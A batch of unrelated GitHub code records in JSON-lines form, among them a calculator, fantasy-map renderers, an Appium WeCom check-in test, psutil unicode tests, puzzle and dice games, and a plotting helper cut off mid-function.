square(self, number):\n self.number = number\n return round(math.sqrt(number))\n\n def module(self, x, y):\n self.x = x\n self.y = y\n return x % y\n\n\nloop = True\nwhile loop == True:\n op = input(\n 'Operación a realizar\\n1-Suma\\n2-Resta\\n3-Multiplicacion\\n4-Division\\n5-Potencia\\n6-Raiz\\n7-Modulo\\n')\n calc = Calculator()\n selected=int(op)\n if selected == 1:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.add(num_one,num_two)\n if selected == 2:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.subtract(num_one,num_two)\n if selected == 3:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.multiply(num_one,num_two)\n if selected == 4:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.divide(num_one,num_two)\n if selected == 5:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.potence(num_one,num_two)\n if selected == 6:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.square(num_one,num_two)\n if selected == 7:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.module(num_one,num_two)\n \n print(result)","repo_name":"diegomezg/python-practices","sub_path":"Practicas/p6/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"16012385346","text":"\"\"\"\nFor visual debugging.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.patches import Polygon\nfrom random import random\nfrom pprint import pprint\n\n\nclass MatplotRenderer:\n\n def __init__(self, verbose=False):\n self.verbose = verbose\n plt.figure(figsize=(12, 12))\n plt.axis([-0.05, 1.05, -0.05, 1.05])\n self.ax = plt.subplot(1, 1, 1)\n\n def draw_reivers(self, map_obj):\n for edge in map_obj.edges:\n if not edge.river:\n continue\n\n 
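 # each river edge is drawn as a straight blue segment between its two corner\n # points, with the line width taken from edge.river so larger rivers plot thicker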
self.ax.plot(\n [edge.corners[0].point[0], edge.corners[1].point[0]],\n [edge.corners[0].point[1], edge.corners[1].point[1]],\n '-', color='#1b6ee3', linewidth=edge.river)\n\n\nclass GraphRenderer(MatplotRenderer):\n\n def render_points(self, map_obj):\n x = [center.point[0] for center in map_obj.centers]\n y = [center.point[1] for center in map_obj.centers]\n self.ax.plot(x, y, 'go')\n plt.show()\n\n def render_centers(self, map_obj):\n x = [center.point[0] for center in map_obj.centers]\n y = [center.point[1] for center in map_obj.centers]\n self.ax.plot(x, y, 'go')\n\n for center in map_obj.centers:\n facecolor = (1, 1, 1)\n # if center.border:\n # facecolor = (0.2, 0.2, 0.8)\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n if self.verbose:\n for edge in center.borders:\n self.ax.plot(\n [center.point[0], edge.midpoint[0]],\n [center.point[1], edge.midpoint[1]],\n 'k--')\n\n for neigh in center.neighbors:\n self.ax.plot(\n [center.point[0], neigh.point[0]],\n [center.point[1], neigh.point[1]],\n 'k:')\n\n plt.show()\n\n def render_corners(self, map_obj):\n x = [corner.point[0] for corner in map_obj.corners if not corner.border]\n y = [corner.point[1] for corner in map_obj.corners if not corner.border]\n self.ax.plot(x, y, 'go')\n\n x = [corner.point[0] for corner in map_obj.corners if corner.border]\n y = [corner.point[1] for corner in map_obj.corners if corner.border]\n self.ax.plot(x, y, 'b.')\n\n for corner in map_obj.corners:\n for neigh in corner.adjacent:\n self.ax.plot(\n [corner.point[0], neigh.point[0]],\n [corner.point[1], neigh.point[1]],\n 'k:')\n\n plt.show()\n\n def render_edges(self, map_obj):\n for edge in map_obj.edges:\n style = 'k-'\n if edge.border:\n style = 'g--'\n self.ax.plot(\n [edge.corners[0].point[0], edge.corners[1].point[0]],\n [edge.corners[0].point[1], edge.corners[1].point[1]],\n style)\n\n if self.verbose:\n for center in edge.centers:\n self.ax.plot(\n [center.point[0], edge.midpoint[0]],\n [center.point[1], edge.midpoint[1]],\n 'k--')\n\n plt.show()\n\n\nclass LandRendered(MatplotRenderer):\n\n def render(self, map_obj):\n for center in map_obj.centers:\n facecolor = '#ac9f8b'\n\n if center.water:\n facecolor = '#1b6ee3'\n\n if center.ocean:\n facecolor = '#abceff'\n\n if center.coast:\n facecolor = '#f0f5ea'\n\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n # render water corners\n x = [corner.point[0] for corner in map_obj.corners if corner.water]\n y = [corner.point[1] for corner in map_obj.corners if corner.water]\n self.ax.plot(x, y, 'o', markerfacecolor='#1b6ee3')\n\n # render ocean corners\n x = [corner.point[0] for corner in map_obj.corners if corner.ocean]\n y = [corner.point[1] for corner in map_obj.corners if corner.ocean]\n self.ax.plot(x, y, 'o', markerfacecolor='#abceff')\n\n # render ocean corners\n x = [corner.point[0] for corner in map_obj.corners if corner.coast]\n y = [corner.point[1] for corner in map_obj.corners if corner.coast]\n self.ax.plot(x, y, 'o', markerfacecolor='#f0f5ea')\n\n plt.show()\n\n\nclass ElevationRenderer(MatplotRenderer):\n\n def __init__(self, verbose=False, rivers=True):\n self.rivers = rivers\n super(ElevationRenderer, self).__init__(verbose)\n\n def render(self, map_obj):\n for corner in map_obj.corners:\n if self.rivers and corner.river:\n markerfacecolor = '#1b6ee3'\n else:\n col = 1 - corner.elevation\n markerfacecolor = (col, col, col)\n self.ax.plot([corner.point[0]], [corner.point[1]], 'o', 
markerfacecolor=markerfacecolor)\n\n for center in map_obj.centers:\n if center.water:\n facecolor = '#1b6ee3'\n if center.ocean:\n facecolor = '#abceff'\n else:\n col = 0.2 + (1 - center.elevation) * 0.8\n facecolor = (col, col, col)\n\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n if self.rivers:\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\nclass MoistureRenderer(MatplotRenderer):\n\n def render(self, map_obj):\n for corner in map_obj.corners:\n col = 1 - corner.moisture\n markerfacecolor = (col, col, col)\n self.ax.plot([corner.point[0]], [corner.point[1]], 'o', markerfacecolor=markerfacecolor)\n\n for center in map_obj.centers:\n if center.water:\n facecolor = '#1b6ee3'\n if center.ocean:\n facecolor = '#abceff'\n else:\n col = 0.2 + (1 - center.elevation) * 0.8\n facecolor = (col, col, col)\n\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\nclass BiomeRenderer(MatplotRenderer):\n\n def render(self, map_obj):\n light_vector = np.array([1, 1, 1])\n\n for center in map_obj.centers:\n biome_color = center.biome_color\n if center.water:\n p = Polygon([c.point for c in center.corners], color=biome_color)\n self.ax.add_patch(p)\n else:\n for edge in center.borders:\n lightning = calc_lightning(center, edge, light_vector)\n color_low = interpolate_color(biome_color, '#333333', 0.7)\n color_high = interpolate_color(biome_color, '#ffffff', 0.3)\n if lightning < 0.5:\n color = interpolate_color(color_low, biome_color, lightning)\n else:\n color = interpolate_color(biome_color, color_high, lightning)\n poly = [center.point, edge.corners[0].point, edge.corners[1].point]\n self.ax.add_patch(Polygon(poly, color=color, linewidth=2, linestyle='dotted'))\n\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\nclass RegionRenderer(MatplotRenderer):\n\n def render(self, map_obj):\n region_colors = {\n None: '#ffffff'\n }\n regions = {}\n\n for center in map_obj.centers:\n if center.water:\n p = Polygon([c.point for c in center.corners], color=center.biome_color)\n self.ax.add_patch(p)\n else:\n if center.region not in region_colors:\n region_colors[center.region] = (\n max(0.2, random()),\n max(0.2, random()),\n max(0.2, random())\n )\n\n if center.region in regions:\n regions[center.region] += 1\n else:\n regions[center.region] = 1\n\n p = Polygon([c.point for c in center.corners], color=region_colors[center.region])\n self.ax.add_patch(p)\n\n for region in map_obj.regions:\n point = region.capital.point\n self.ax.plot([point[0]], [point[1]], 'o', markerfacecolor='#000000')\n\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\ndef calc_lightning(center, edge, light_vector):\n # Return light level for each edge (0-1).\n light_vector = light_vector / np.linalg.norm(light_vector)\n\n c1 = edge.corners[0]\n c2 = edge.corners[1]\n\n v1 = np.array([\n center.point[0],\n center.point[1],\n center.elevation\n ])\n\n v2 = np.array([\n c1.point[0],\n c1.point[1],\n c1.elevation\n ])\n\n v3 = np.array([\n c2.point[0],\n c2.point[1],\n c2.elevation\n ])\n\n normal = np.cross(v2 - v1, v3 - v1)\n if normal[2] < 0:\n normal *= -1\n\n normal = normal / np.linalg.norm(normal)\n return 0.5 + 0.5 * np.dot(normal, light_vector)\n\n\ndef interpolate_color(color1, color2, f):\n \"\"\"\n Helper function for color manipulation. 
When f==0: color1, f==1: color2\n \"\"\"\n color1 = [int(color1[x:x+2], 16) for x in [1, 3, 5]]\n color2 = [int(color2[x:x+2], 16) for x in [1, 3, 5]]\n r = (1 - f) * color1[0] + f * color2[0]\n g = (1 - f) * color1[1] + f * color2[1]\n b = (1 - f) * color1[2] + f * color2[2]\n\n if r > 255:\n r = 0\n if g > 255:\n g = 0\n if b > 255:\n b = 0\n return '#%02x%02x%02x' % (r, g, b)\n","repo_name":"Alerion/fantasy_map","sub_path":"map/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":9780,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"18375803045","text":"'''\n企业微信打卡案例\n前提条件\n已登录状态( noReset=True)\n打卡用例:\n1、打开【企业微信】应用\n2、进入【工作台】\n3、点击【打卡】\n4、选择【外出打卡】tab\n5、点击【第N次打卡】\n6、验证【外出打卡成功】\n7、退出【企业微信】应用\n'''\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\n\nclass TestWeWork:\n def setup(self):\n caps = {}\n caps[\"platformName\"] = \"Android\"\n caps[\"deviceName\"] = \"Rose\"\n caps[\"appPackage\"] = \"com.tencent.wework\"\n caps[\"appActivity\"] = \".launch.LaunchSplashActivity\"\n # caps[\"ensureWebviewsHavePages\"] = True\n caps[\"noReset\"] = \"True\"\n # caps[\"settings[waitForIdleTimeout]\"] = 0\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', caps)\n self.driver.implicitly_wait(10)\n\n def teardown(self):\n self.driver.quit()\n\n def test_wework_daka(self):\n self.driver.find_element(MobileBy.XPATH, \"//*[@text='工作台']\").click()\n for i in range(3):\n try:\n self.driver.find_element(MobileBy.XPATH, \"//*[@text='打卡']\").click()\n break\n except Exception as e:\n print(e)\n # self.driver.find_element(MobileBy.ANDROID_UIAUTOMATOR,\n # 'new UiScrollable(new UiSelector().'\n # 'scrollable(true).instance(0)).'\n # 'scrollIntoView(new UiSelector().text(\"打卡\")'\n # '.instance(0));').click()\n self.driver.update_settings({'waitForIdleTimeout': 1})\n self.driver.find_element(MobileBy.XPATH, \"//*[@text='外出打卡']\").click()\n self.driver.find_element(MobileBy.XPATH, \"//*[contains(@text,'次��出')]\").click()\n assert self.driver.find_element(MobileBy.XPATH, \"//*[@text='外出打卡成功']\").text == '外出打卡成功'\n","repo_name":"Lusilucy/Sencond","sub_path":"16-19App/18WorkSpace/WXdaka/test_wework.py","file_name":"test_wework.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9661265758","text":"import string\r\n\r\ndaysInYear = 100\r\ndaysInMonth = 10\r\ndaysInWeek = 10\r\ndate = \"0001-01-01\"\r\n\r\ndef Week():\r\n dayOfTheWeek =[]\r\n for i in string.ascii_uppercase:\r\n dayOfTheWeek.append(i)\r\n\r\n return dayOfTheWeek\r\n\r\ndef y_m(daysInYear,daysInMonth):\r\n one_Yesr = daysInYear / daysInMonth\r\n Day_excess = daysInYear % daysInMonth\r\n \r\n return one_Yesr,Day_excess\r\n\r\ndef date_factor(date): \r\n date_YMW = date.split('-')\r\n date_Year = int(date_YMW[0])\r\n date_Month = int(date_YMW[1])\r\n date_Day = int(date_YMW[2])\r\n return(date_Year, date_Month, date_Day)\r\n\r\ndef main (Day_excess,date_Day,daysInWeek):\r\n if date_Day <= int(daysInMonth) and date_Month <= one_Yesr:\r\n if Day_excess == 0:\r\n while(date_Day > daysInWeek):\r\n date_Day = date_Day - daysInWeek \r\n #print(date_Day)\r\n print(dayOfTheWeek[date_Day-1])\r\n\r\n #elif date_Day > int(daysInMonth) or date_Month > one_Yesr:\r\n else:\r\n print(-1)\r\n\r\n#def youbi():\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #lines = []\r\n daysInYear, daysInMonth, daysInWeek, date = input().split()\r\n 
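 # the four values arrive as one space-separated line (e.g. the defaults above)\r\n # and remain strings here; they are cast to int where needed further down\r\n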
#for l in sys.stdin:\r\n # lines.append(l.rstrip('\\r\\n'))\r\n #main(lines)\r\n #print(lines)\r\n dayOfTheWeek = Week()\r\n #print(dayOfTheWeek)\r\n one_Yesr,Day_excess = (y_m(int(daysInYear),int(daysInMonth)))\r\n #print(one_Yesr,Day_excess)\r\n date_Year, date_Month, date_Day = date_factor(date)\r\n #print(date_Year)\r\n main(int(Day_excess),int(date_Day),int(daysInWeek))","repo_name":"onoda4480/mycode","sub_path":"calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1384991085","text":"import tkinter\nfrom PIL import Image, ImageTk\nimport random\n\n# main window of application\nroot = tkinter.Tk()\nroot.geometry('800x800')\nroot.title('Roll the Dice')\n\n# Blank label for space \nl0 = tkinter.Label(root, text=\"\")\nl0.pack()\n\n# Label window\nl1 = tkinter.Label(root, text=\"Hey!\", font = \"Helvetica 16 bold italic\")\nl1.pack()\n\n# Image list\ndice = ['d1.png', 'd2.png', 'd3.png', 'd4.png', 'd5.png', 'd6.png']\n# Using random function selecting a random image from 1-6 numbers on dice\nimg1 = ImageTk.PhotoImage(Image.open(random.choice(dice)))\n\n# label for image\nlabel1 = tkinter.Label(root, image=img1)\nlabel1.image = img1\nlabel1.pack( expand=True)\n\n# function to define a command which selects image\ndef dice_roll():\n img1 = ImageTk.PhotoImage(Image.open(random.choice(dice)))\n # Updating image\n label1.config(image=img1)\n label1.image = img1\n \n# button for roll the dice\nbtn = tkinter.Button(root, text='Roll the Dice', fg='blue', command=dice_roll)\nbtn.pack( expand=True)\n\n# Mainloop which keeps the window open\nroot.mainloop()","repo_name":"darshil1999/python-project","sub_path":"1/Dice Rolling Simulator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21384065175","text":"import os\nimport shutil\nimport traceback\nimport unittest\nimport warnings\nfrom contextlib import closing\n\nimport psutil\nfrom psutil import BSD\nfrom psutil import POSIX\nfrom psutil import WINDOWS\nfrom psutil._compat import PY3\nfrom psutil._compat import u\nfrom psutil.tests import APPVEYOR\nfrom psutil.tests import ASCII_FS\nfrom psutil.tests import CI_TESTING\nfrom psutil.tests import HAS_CONNECTIONS_UNIX\nfrom psutil.tests import HAS_ENVIRON\nfrom psutil.tests import HAS_MEMORY_MAPS\nfrom psutil.tests import INVALID_UNICODE_SUFFIX\nfrom psutil.tests import PYPY\nfrom psutil.tests import TESTFN_PREFIX\nfrom psutil.tests import UNICODE_SUFFIX\nfrom psutil.tests import PsutilTestCase\nfrom psutil.tests import bind_unix_socket\nfrom psutil.tests import chdir\nfrom psutil.tests import copyload_shared_lib\nfrom psutil.tests import create_exe\nfrom psutil.tests import get_testfn\nfrom psutil.tests import safe_mkdir\nfrom psutil.tests import safe_rmpath\nfrom psutil.tests import serialrun\nfrom psutil.tests import skip_on_access_denied\nfrom psutil.tests import spawn_testproc\nfrom psutil.tests import terminate\n\n\nif APPVEYOR:\n def safe_rmpath(path): # NOQA\n # TODO - this is quite random and I'm not sure why it happens,\n # nor I can reproduce it locally:\n # https://ci.appveyor.com/project/giampaolo/psutil/build/job/\n # jiq2cgd6stsbtn60\n # safe_rmpath() happens after reap_children() so this is weird\n # Perhaps wait_procs() on Windows is broken? 
Maybe because\n # of STILL_ACTIVE?\n # https://github.com/giampaolo/psutil/blob/\n # 68c7a70728a31d8b8b58f4be6c4c0baa2f449eda/psutil/arch/\n # windows/process_info.c#L146\n from psutil.tests import safe_rmpath as rm\n try:\n return rm(path)\n except WindowsError:\n traceback.print_exc()\n\n\ndef try_unicode(suffix):\n \"\"\"Return True if both the fs and the subprocess module can\n deal with a unicode file name.\n \"\"\"\n sproc = None\n testfn = get_testfn(suffix=suffix)\n try:\n safe_rmpath(testfn)\n create_exe(testfn)\n sproc = spawn_testproc(cmd=[testfn])\n shutil.copyfile(testfn, testfn + '-2')\n safe_rmpath(testfn + '-2')\n except (UnicodeEncodeError, IOError):\n return False\n else:\n return True\n finally:\n if sproc is not None:\n terminate(sproc)\n safe_rmpath(testfn)\n\n\n# ===================================================================\n# FS APIs\n# ===================================================================\n\n\nclass BaseUnicodeTest(PsutilTestCase):\n funky_suffix = None\n\n def setUp(self):\n if self.funky_suffix is not None:\n if not try_unicode(self.funky_suffix):\n raise self.skipTest(\"can't handle unicode str\")\n\n\n@serialrun\n@unittest.skipIf(ASCII_FS, \"ASCII fs\")\n@unittest.skipIf(PYPY and not PY3, \"too much trouble on PYPY2\")\nclass TestFSAPIs(BaseUnicodeTest):\n \"\"\"Test FS APIs with a funky, valid, UTF8 path name.\"\"\"\n\n funky_suffix = UNICODE_SUFFIX\n\n @classmethod\n def setUpClass(cls):\n cls.funky_name = get_testfn(suffix=cls.funky_suffix)\n create_exe(cls.funky_name)\n\n @classmethod\n def tearDownClass(cls):\n safe_rmpath(cls.funky_name)\n\n def expect_exact_path_match(self):\n # Do not expect psutil to correctly handle unicode paths on\n # Python 2 if os.listdir() is not able either.\n here = '.' 
if isinstance(self.funky_name, str) else u('.')\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n return self.funky_name in os.listdir(here)\n\n # ---\n\n def test_proc_exe(self):\n subp = self.spawn_testproc(cmd=[self.funky_name])\n p = psutil.Process(subp.pid)\n exe = p.exe()\n self.assertIsInstance(exe, str)\n if self.expect_exact_path_match():\n self.assertEqual(os.path.normcase(exe),\n os.path.normcase(self.funky_name))\n\n def test_proc_name(self):\n subp = self.spawn_testproc(cmd=[self.funky_name])\n name = psutil.Process(subp.pid).name()\n self.assertIsInstance(name, str)\n if self.expect_exact_path_match():\n self.assertEqual(name, os.path.basename(self.funky_name))\n\n def test_proc_cmdline(self):\n subp = self.spawn_testproc(cmd=[self.funky_name])\n p = psutil.Process(subp.pid)\n cmdline = p.cmdline()\n for part in cmdline:\n self.assertIsInstance(part, str)\n if self.expect_exact_path_match():\n self.assertEqual(cmdline, [self.funky_name])\n\n def test_proc_cwd(self):\n dname = self.funky_name + \"2\"\n self.addCleanup(safe_rmpath, dname)\n safe_mkdir(dname)\n with chdir(dname):\n p = psutil.Process()\n cwd = p.cwd()\n self.assertIsInstance(p.cwd(), str)\n if self.expect_exact_path_match():\n self.assertEqual(cwd, dname)\n\n @unittest.skipIf(PYPY and WINDOWS, \"fails on PYPY + WINDOWS\")\n def test_proc_open_files(self):\n p = psutil.Process()\n start = set(p.open_files())\n with open(self.funky_name, 'rb'):\n new = set(p.open_files())\n path = (new - start).pop().path\n self.assertIsInstance(path, str)\n if BSD and not path:\n # XXX - see https://github.com/giampaolo/psutil/issues/595\n return self.skipTest(\"open_files on BSD is broken\")\n if self.expect_exact_path_match():\n self.assertEqual(os.path.normcase(path),\n os.path.normcase(self.funky_name))\n\n @unittest.skipIf(not POSIX, \"POSIX only\")\n def test_proc_connections(self):\n name = self.get_testfn(suffix=self.funky_suffix)\n try:\n sock = bind_unix_socket(name)\n except UnicodeEncodeError:\n if PY3:\n raise\n else:\n raise unittest.SkipTest(\"not supported\")\n with closing(sock):\n conn = psutil.Process().connections('unix')[0]\n self.assertIsInstance(conn.laddr, str)\n self.assertEqual(conn.laddr, name)\n\n @unittest.skipIf(not POSIX, \"POSIX only\")\n @unittest.skipIf(not HAS_CONNECTIONS_UNIX, \"can't list UNIX sockets\")\n @skip_on_access_denied()\n def test_net_connections(self):\n def find_sock(cons):\n for conn in cons:\n if os.path.basename(conn.laddr).startswith(TESTFN_PREFIX):\n return conn\n raise ValueError(\"connection not found\")\n\n name = self.get_testfn(suffix=self.funky_suffix)\n try:\n sock = bind_unix_socket(name)\n except UnicodeEncodeError:\n if PY3:\n raise\n else:\n raise unittest.SkipTest(\"not supported\")\n with closing(sock):\n cons = psutil.net_connections(kind='unix')\n conn = find_sock(cons)\n self.assertIsInstance(conn.laddr, str)\n self.assertEqual(conn.laddr, name)\n\n def test_disk_usage(self):\n dname = self.funky_name + \"2\"\n self.addCleanup(safe_rmpath, dname)\n safe_mkdir(dname)\n psutil.disk_usage(dname)\n\n @unittest.skipIf(not HAS_MEMORY_MAPS, \"not supported\")\n @unittest.skipIf(not PY3, \"ctypes does not support unicode on PY2\")\n @unittest.skipIf(PYPY, \"unstable on PYPY\")\n def test_memory_maps(self):\n # XXX: on Python 2, using ctypes.CDLL with a unicode path\n # opens a message box which blocks the test run.\n with copyload_shared_lib(suffix=self.funky_suffix) as funky_path:\n def normpath(p):\n return 
os.path.realpath(os.path.normcase(p))\n libpaths = [normpath(x.path)\n for x in psutil.Process().memory_maps()]\n # ...just to have a clearer msg in case of failure\n libpaths = [x for x in libpaths if TESTFN_PREFIX in x]\n self.assertIn(normpath(funky_path), libpaths)\n for path in libpaths:\n self.assertIsInstance(path, str)\n\n\n@unittest.skipIf(CI_TESTING, \"unreliable on CI\")\nclass TestFSAPIsWithInvalidPath(TestFSAPIs):\n \"\"\"Test FS APIs with a funky, invalid path name.\"\"\"\n\n funky_suffix = INVALID_UNICODE_SUFFIX\n\n def expect_exact_path_match(self):\n # Invalid unicode names are supposed to work on Python 2.\n return True\n\n\n# ===================================================================\n# Non fs APIs\n# ===================================================================\n\n\nclass TestNonFSAPIS(BaseUnicodeTest):\n \"\"\"Unicode tests for non fs-related APIs.\"\"\"\n\n funky_suffix = UNICODE_SUFFIX if PY3 else 'è'\n\n @unittest.skipIf(not HAS_ENVIRON, \"not supported\")\n @unittest.skipIf(PYPY and WINDOWS, \"segfaults on PYPY + WINDOWS\")\n def test_proc_environ(self):\n # Note: differently from others, this test does not deal\n # with fs paths. On Python 2 subprocess module is broken as\n # it's not able to handle with non-ASCII env vars, so\n # we use \"è\", which is part of the extended ASCII table\n # (unicode point <= 255).\n env = os.environ.copy()\n env['FUNNY_ARG'] = self.funky_suffix\n sproc = self.spawn_testproc(env=env)\n p = psutil.Process(sproc.pid)\n env = p.environ()\n for k, v in env.items():\n self.assertIsInstance(k, str)\n self.assertIsInstance(v, str)\n self.assertEqual(env['FUNNY_ARG'], self.funky_suffix)\n\n\nif __name__ == '__main__':\n from psutil.tests.runner import run_from_name\n run_from_name(__file__)\n","repo_name":"giampaolo/psutil","sub_path":"psutil/tests/test_unicode.py","file_name":"test_unicode.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":9653,"dataset":"github-code","pt":"60"} +{"seq_id":"26613312039","text":"import sys\nif sys.version_info[0] == 3:\n # for Python3\n from tkinter import * ## notice lowercase 't' in tkinter here\nelse:\n # for Python2\n from Tkinter import * ## notice capitalized T in Tkinter\n\n# This is not really part of the assignment\n# I meant to incorporate the search algorithms to let the computer solve the problem\n# At least it helped me visualize the problem\n# repeat - this part does not support the search algorithms, but if youre bored play away\n\nfrom PuzzleBoard import PuzzleBoard\nfrom State import State\nimport numpy as np\n\nclass Main:\n # just a main class\n def __init__(self, master):\n # constructor\n self.canvas_width = 300\n self.canvas_height = 300\n self.rectangles = [0] *8\n self.texts = [0] *8\n\n self.board = PuzzleBoard()\n\n # setting up the tkinter GUI\n self.master = master\n master.title(\"8 Puzzle\")\n master.geometry('640x480')\n\n self.label = Label(master, text=\"This is 8 Puzzle\")\n self.label.pack()\n\n self.score = Label(master, text=self.board.getScore())\n self.score.pack()\n\n self.canvasSpace = Canvas(master, width=self.canvas_width, height=self.canvas_height)\n self.canvasSpace.pack()\n\n self.canvasSpace.create_rectangle(0, 0, 300, 300, fill=\"#696969\")\n self.drawBoard(self.canvasSpace)\n\n self.resetPuzzle_button = Button(master, text=\"Reset Puzzle\", command=self.newPuzzle)\n self.resetPuzzle_button.pack()\n\n self.close_button = Button(master, text=\"Close\", command=master.quit)\n 
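 # as with the other controls, the widget is created first and then packed;\n # pack() with no options stacks the buttons top-to-bottom in creation order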
self.close_button.pack()\n\n self.up_button = Button(master, text=\"Up\", command=self.moveUp)\n self.up_button.pack()\n\n self.down_button = Button(master, text=\"Down\", command=self.moveDown)\n self.down_button.pack()\n\n self.left_button = Button(master, text=\"Left\", command=self.moveLeft)\n self.left_button.pack()\n\n self.right_button = Button(master, text=\"Right\", command=self.moveRight)\n self.right_button.pack()\n\n # processing button clicks\n def moveRight(self):\n self.board.moveRight()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def moveLeft(self):\n self.board.moveLeft()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def moveDown(self):\n self.board.moveDown()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def moveUp(self):\n self.board.moveUp()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def newPuzzle(self):\n print('hello')\n self.board.resetPuzzle()\n self.board.resetScore()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n # drawing the board after every click\n def drawBoard(self, canvas):\n for rec in self.rectangles:\n canvas.delete(rec)\n\n for txt in self.texts:\n canvas.delete(txt)\n\n currentState = self.board.getState()\n for i in range(3):\n for j in range(3):\n if currentState[i][j] != 0:\n origin_X = 100*i\n origin_Y = 100*j\n final_X = origin_X+100\n final_Y = origin_Y+100\n self.rectangles.append(canvas.create_rectangle(origin_X, origin_Y, final_X, final_Y, fill=\"#DCDCDC\"))\n self.texts.append(canvas.create_text(origin_X+50,origin_Y+50,text=currentState[i][j]))\n\nroot = Tk()\nmainPanel = Main(root)\nroot.mainloop()\n","repo_name":"reidtc82/8puzzle","sub_path":"ForHumanstoPlay.py","file_name":"ForHumanstoPlay.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9508158941","text":"from carton import Carton\n\nf = open('input','r')\n\nentry = [int(s) for s in f.readline().split(\",\")]\n\nlines = f.readlines()\nt = len(lines)\n\ni = 1\ncards = []\nwhile (i < t):\n data = []\n for j in range(5):\n data.append([int(v) for v in lines[i].split()])\n i += 1\n d = Carton(data)\n cards.append(d)\n i += 1 ## Una linéa en blanco\n\nfor n in entry:\n if (len(cards) == 0):\n exit(0)\n print(\"Probando el número: \" + str(n))\n borrados = []\n for card in cards:\n card.mark(n)\n if (card.check()):\n print(\"Hemos encontrado línea\")\n print(card)\n print(\"Numero: \" + str(n))\n print(card.sum_unmarked() * n)\n borrados.append(card)\n #print(\"Número de tarjetas \" + str(len(cards)))\n #exit(0)\n else:\n print(card)\n print(\"_______________________________________________________________________________________\") \n for b in borrados:\n cards.remove(b)\n","repo_name":"ingjrs01/adventofcode","sub_path":"2021/day04/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17740048609","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport time\n#from .helper import get_constant_string\n# from constants import * # Capital lettered variables are constants from the constants.py file\n\nimport os\n\n\ndef calculate_moving_avarage(scores, num_agent=1, scores_window=100):\n if num_agent < 2: single_agent_returns = 
np.transpose(np.array(scores))\n else: single_agent_returns = np.transpose(np.array(scores))\n moving_avarages = [np.convolve(single_agent_returns[i], np.ones(scores_window)/scores_window, mode='valid') for i in range(num_agent)]\n\n return moving_avarages\n\n\ndef calculate_max(scores):\n new_scores = scores.copy()\n\n for i, episode_score in enumerate(new_scores):\n new_scores[i] = np.delete(episode_score, np.argmin(episode_score))\n\n return new_scores\n # best_score = []\n\n # for i, episode_score in enumerate(scores):\n # best_score.append(np.max(episode_score))\n\n # return best_score\n\n\ndef render_figure(scores, agents, env_params, name=\"\", scores_window=0, path=\"\", goal=0, save=False, display= True):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n # fig, (ax, tb) = plt.subplots(nrows=1, ncols=2)\n fig = plt.figure()\n\n ax = fig.add_subplot(1, 3, (1, 2))\n tb1 = fig.add_subplot(3, 3, 3)\n tb2 = fig.add_subplot(3, 3, 6)\n tb3 = fig.add_subplot(3, 3, 9)\n\n # --- Plot labels --- #\n for_title, for_filename, for_table, for_id = agents[0].get_title()\n\n\n ax.set_title(for_title)\n ax.set_ylabel('Score')\n ax.set_xlabel('Episode #')\n\n fig.text(0.975, 0.1, for_id, size=7, color='gray', \n horizontalalignment='right',\n verticalalignment='top')\n\n\n\n\n # --- Plot scores --- #\n if len(agents)>1: # multiple agents\n accumulated_by_agent = np.transpose(np.array(scores))\n for i_agent in range(len(agents)):\n ax.plot(np.arange(1, len(accumulated_by_agent[i_agent])+1), accumulated_by_agent[i_agent])\n else: ax.plot(np.arange(1, len(scores)+1), scores)\n\n # --- Plot moving avarages --- #\n 